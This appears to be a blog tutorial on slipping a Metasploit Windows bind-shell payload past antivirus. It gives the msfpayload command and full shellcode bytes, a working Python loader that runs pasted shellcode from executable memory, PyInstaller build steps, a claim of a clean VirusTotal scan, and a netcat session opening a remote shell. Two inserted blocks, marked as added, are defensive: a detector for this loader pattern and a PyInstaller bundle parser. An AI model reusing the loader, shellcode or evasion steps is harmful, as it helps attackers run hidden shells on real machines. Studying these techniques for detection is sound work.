I am going to demonstrate a little trick that allows you to bypass anti-virus and execute shellcode. This is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell; however, any shellcode can be used, I have simply chosen this one for simplicity.
As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.
So, first of all let’s generate a Metasploit payload:
root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "\n" "," | sed s'/,//g' && echo ""
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5
root@kali:~#
Copy the line of shellcode that gets returned; we will paste it into the binary later. Be aware that if you change the payload, the above command will not work as-is: the grep/sed chain is specific to extracting the opcodes from the msfpayload C output for that payload.
Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.
The following piece of Python code takes shellcode as input, copies it into a newly allocated region of memory and finally executes it from there, which is what bypasses anti-virus: the shellcode is supplied at run time rather than embedded in the binary, so there is nothing in the file for a signature to match. We achieve this with four Windows API calls: VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject. Here is the Python code:
#!C:\Python27\python.exe
from ctypes import *

# Grab shellcode from the user so it's not hardcoded in the binary.
# Python 2 input() evaluates what is pasted, which is why the shellcode
# has to be wrapped in single quotes.
sc = bytearray(input("Paste the shellcode inside single quotes:\n\n"))

print "\n\nRunning shellcode in memory...\n\n"

# Reserves or commits a region of pages in the virtual address space of the calling process.
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
# Named ptr (not pointer) so it does not shadow ctypes.pointer(), which is needed below.
ptr = windll.kernel32.VirtualAlloc(c_int(0), c_int(len(sc)), c_int(0x3000), c_int(0x40))

buf = (c_char * len(sc)).from_buffer(sc)

# The RtlMoveMemory routine copies the contents of a source memory block to a destination
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(ptr), buf, c_int(len(sc)))

# Creates a thread to execute within the virtual address space of the calling process.
ht = windll.kernel32.CreateThread(c_int(0), c_int(0), c_int(ptr), c_int(0), c_int(0), pointer(c_int(0)))

# Waits until the specified object is in the signaled state or the time-out interval elapses.
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))

print "Completed, your shellcode has been injected into memory and should be running..."
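From the defender's side, the interesting thing about the loader above is not the file but the behaviour: an allocation with PAGE_EXECUTE_READWRITE (0x40), a copy into it, and a thread started at an address inside that freshly allocated, module-less region. The following detector is an added example written for this post, not part of the loader or of any product; it runs over a constructed API-call trace whose key=value line format is an assumption standing in for whatever a sandbox or EDR hook actually records, and it goes slightly beyond the page by tracking every RWX region per process rather than just one.

```python
"""Behavioural detection of the VirtualAlloc(RWX) -> copy -> CreateThread chain.

Added example for this page, not the author's code. It scans a trace of API
calls (one call per line, key=value fields; this format is assumed here and
stands in for a real sandbox/EDR hook log) and raises an alert whenever a
thread is started at an address inside a region the same process allocated
as PAGE_EXECUTE_READWRITE. Writes into that region before the thread starts
are recorded as supporting evidence. The trace below is constructed.
"""
import re
from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000

# Constructed trace: pid 1001 behaves normally (read/write heap, thread
# started inside a loaded DLL); pid 4120 follows the loader pattern above.
SAMPLE_TRACE = """\
pid=1001 api=VirtualAlloc lpAddress=0x0 dwSize=0x10000 flAllocationType=0x3000 flProtect=0x4 ret=0x1f0000
pid=1001 api=CreateThread lpStartAddress=0x77a1b2c0 ret=0x1a4
pid=4120 api=VirtualAlloc lpAddress=0x0 dwSize=0x155 flAllocationType=0x3000 flProtect=0x40 ret=0x2a0000
pid=4120 api=RtlMoveMemory Destination=0x2a0000 Source=0x19f3c8 Length=0x155
pid=4120 api=CreateThread lpStartAddress=0x2a0000 ret=0x1b8
pid=4120 api=WaitForSingleObject hHandle=0x1b8 dwMilliseconds=0xffffffff
"""

KV_RE = re.compile(r"(\w+)=(\S+)")
# APIs treated as "writes into the region"; the Destination field name is
# part of the assumed trace format, not a Windows parameter name.
WRITE_APIS = ("RtlMoveMemory", "memcpy", "WriteProcessMemory")


def parse_line(line):
    """Turn 'k=v k=v ...' into a dict; 0x-prefixed values become ints."""
    fields = {}
    for key, val in KV_RE.findall(line):
        fields[key] = int(val, 16) if val.startswith("0x") else val
    return fields


def _in_region(addr, base, size):
    return addr is not None and base <= addr < base + size


def detect_rwx_thread(trace):
    """Return one alert dict per thread created inside an RWX allocation."""
    regions = defaultdict(list)   # pid -> [[base, size, written_to]]
    alerts = []
    for raw in trace.splitlines():
        ev = parse_line(raw)
        pid, api = ev.get("pid"), ev.get("api")
        if api == "VirtualAlloc":
            # Only committed RWX memory can be both written and executed.
            if (ev.get("flProtect") == PAGE_EXECUTE_READWRITE
                    and ev.get("flAllocationType", 0) & MEM_COMMIT
                    and ev.get("ret")):
                regions[pid].append([ev["ret"], ev["dwSize"], False])
        elif api in WRITE_APIS:
            for reg in regions[pid]:
                if _in_region(ev.get("Destination"), reg[0], reg[1]):
                    reg[2] = True
        elif api == "CreateThread":
            start = ev.get("lpStartAddress")
            for base, size, written in regions[pid]:
                if _in_region(start, base, size):
                    alerts.append({
                        "pid": pid,
                        "rwx_base": base,
                        "rwx_size": size,
                        "thread_start": start,
                        "written_before_exec": written,
                        "technique": "thread started inside RWX heap allocation",
                    })
    return alerts


if __name__ == "__main__":
    for alert in detect_rwx_thread(SAMPLE_TRACE):
        print(alert)
```

The check that actually matters is the last one: a thread entry point that lies in anonymous RWX memory instead of a mapped image. Keying on the API names alone would be brittle (the same effect can be had with VirtualAllocEx, NtAllocateVirtualMemory, or a memcpy instead of RtlMoveMemory), which is why the detector keeps region state per process and only uses the copy as corroborating evidence.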
Take the Python loader script from earlier (saved here as crypter2.py) and compile it to a win32 executable using PyInstaller; the -F flag produces a single self-contained .exe:
C:\Users\mike.evans\Desktop\AV>c:\Python27\Scripts\pyinstaller.exe -F crypter2.py
82 INFO: wrote C:\Users\mike.evans\Desktop\AV\crypter2.spec
117 INFO: Testing for ability to set icons, version resources...
247 INFO: ... resource update available
252 INFO: UPX is not available.
283 INFO: Processing hook hook-os
424 INFO: Processing hook hook-time
430 INFO: Processing hook hook-cPickle
510 INFO: Processing hook hook-_sre
667 INFO: Processing hook hook-cStringIO
780 INFO: Processing hook hook-encodings
799 INFO: Processing hook hook-codecs
1440 INFO: Extending PYTHONPATH with C:\Users\mike.evans\Desktop\AV
1440 INFO: checking Analysis
1441 INFO: building Analysis because out00-Analysis.toc non existent
1441 INFO: running Analysis out00-Analysis.toc
1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
1918 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
1925 INFO: Searching for file msvcr90.dll
1927 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
1927 INFO: Searching for file msvcp90.dll
1928 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
1930 INFO: Searching for file msvcm90.dll
1930 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
2058 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\_pyi_bootstrap.py
2078 INFO: Processing hook hook-os
2102 INFO: Processing hook hook-site
2128 INFO: Processing hook hook-encodings
2260 INFO: Processing hook hook-time
2267 INFO: Processing hook hook-cPickle
2351 INFO: Processing hook hook-_sre
2500 INFO: Processing hook hook-cStringIO
2625 INFO: Processing hook hook-codecs
3140 INFO: Processing hook hook-pydoc
3322 INFO: Processing hook hook-email
3401 INFO: Processing hook hook-httplib
3461 INFO: Processing hook hook-email.message
3560 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_importers.py
3628 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_archive.py
3693 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_carchive.py
3752 INFO: Analyzing C:\Python27\lib\site-packages\pyinstaller-2.1-py2.7.egg\PyInstaller\loader\pyi_os_path.py
3763 INFO: Analyzing crypter2.py
3849 INFO: Hidden import 'codecs' has been found otherwise
3851 INFO: Hidden import 'encodings' has been found otherwise
3852 INFO: Looking for run-time hooks
4213 INFO: Using Python library C:\Windows\system32\python27.dll
4450 INFO: Warnings written to C:\Users\mike.evans\Desktop\AV\build\crypter2\warncrypter2.txt
4470 INFO: checking PYZ
4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc
5601 INFO: checking PKG
5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5605 INFO: building PKG (CArchive) out00-PKG.pkg
6776 INFO: checking EXE
6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing
6779 INFO: building EXE from out00-EXE.toc
6818 INFO: Appending archive to EXE C:\Users\mike.evans\Desktop\AV\dist\crypter2.exe
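The last line of that build log ("Appending archive to EXE") is also the easiest static handle a triage tool has on the result: PyInstaller appends its CArchive to the bootloader and terminates it with a cookie that begins with the magic bytes MEI\x0c\x0b\x0a\x0b\x0e. Signature scanners can miss the wrapped script, but the packaging itself is unmistakable. The following parser is an added example written for this post, not PyInstaller's code or the author's; the 2.x cookie layout it reads (magic, package length, TOC offset, TOC length, Python version) is the one PyInstaller 2.1 wrote, and the sample "bundle" it checks is constructed in the script rather than being a real executable.

```python
"""Static triage: recognise a PyInstaller one-file bundle by its archive cookie.

Added example for this page, not the author's or PyInstaller's code. The
cookie layout '!8siiii' (magic, package length, TOC offset, TOC length,
Python version as e.g. 27) is the PyInstaller 2.x layout; later releases
extend the cookie, so a production tool should handle both. The sample
bundle below is constructed, not a real executable.
"""
import struct

PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FORMAT = "!8siiii"                      # PyInstaller 2.x cookie, big-endian
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)   # 24 bytes
TAIL_SEARCH = 4096   # how far from the end to look; overlays (e.g. a code-signing
                     # blob appended after the archive) can push the cookie back a bit


def build_sample_bundle(pyvers=27, payload_len=4096):
    """Construct a fake one-file bundle: stub + opaque archive + cookie.

    Deterministic filler is used for the archive so the test is repeatable
    and cannot accidentally contain the magic.
    """
    stub = b"MZ" + bytes(range(256)) * 4                         # fake bootloader, 1026 bytes
    archive = bytes((i * 7) % 251 for i in range(payload_len))  # stand-in for PKG/PYZ
    package_len = payload_len + COOKIE_SIZE                     # cookie counts itself
    cookie = struct.pack(COOKIE_FORMAT, PYINSTALLER_MAGIC, package_len,
                         payload_len - 64, 64, pyvers)          # TOC values illustrative
    return stub + archive + cookie


def find_pyinstaller_cookie(data):
    """Return parsed cookie fields if data carries a PyInstaller archive, else None."""
    tail_start = max(0, len(data) - TAIL_SEARCH)
    idx = data.rfind(PYINSTALLER_MAGIC, tail_start)
    if idx == -1 or idx + COOKIE_SIZE > len(data):
        return None
    _magic, package_len, toc_off, toc_len, pyvers = struct.unpack_from(COOKIE_FORMAT, data, idx)
    return {
        "cookie_offset": idx,
        # package_len spans the archive up to and including the cookie
        "archive_start": idx + COOKIE_SIZE - package_len,
        "package_len": package_len,
        "toc_off": toc_off,
        "toc_len": toc_len,
        "python_version": "%d.%d" % (pyvers // 10, pyvers % 10),
    }


def is_pyinstaller_bundle(data):
    return find_pyinstaller_cookie(data) is not None


if __name__ == "__main__":
    sample = build_sample_bundle()
    print(find_pyinstaller_cookie(sample))
    print(is_pyinstaller_bundle(b"MZ not a bundle"))
```

Knowing the archive start and the interpreter version is enough to pull the embedded script out for review, which is a far more productive triage step than waiting for a file signature to catch up with a wrapper that is, by design, generic.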
Now we have the binary, let's check VirusTotal and see what it scores:

Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:
C:\Users\mike.evans\Desktop\AV\dist>crypter2.exe
Paste the shellcode inside single quotes:

'\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31\xdb\x53\x68\x02\x00\x7a\x69\x89\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5'


Running shellcode in memory...
Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:
dustys-air:~ dusty$ nc 172.16.40.208 31337
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\mike.evans\Desktop\AV\dist>whoami
whoami
win-2q626uv3pte\mike.evans

C:\Users\mike.evans\Desktop\AV\dist>
This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.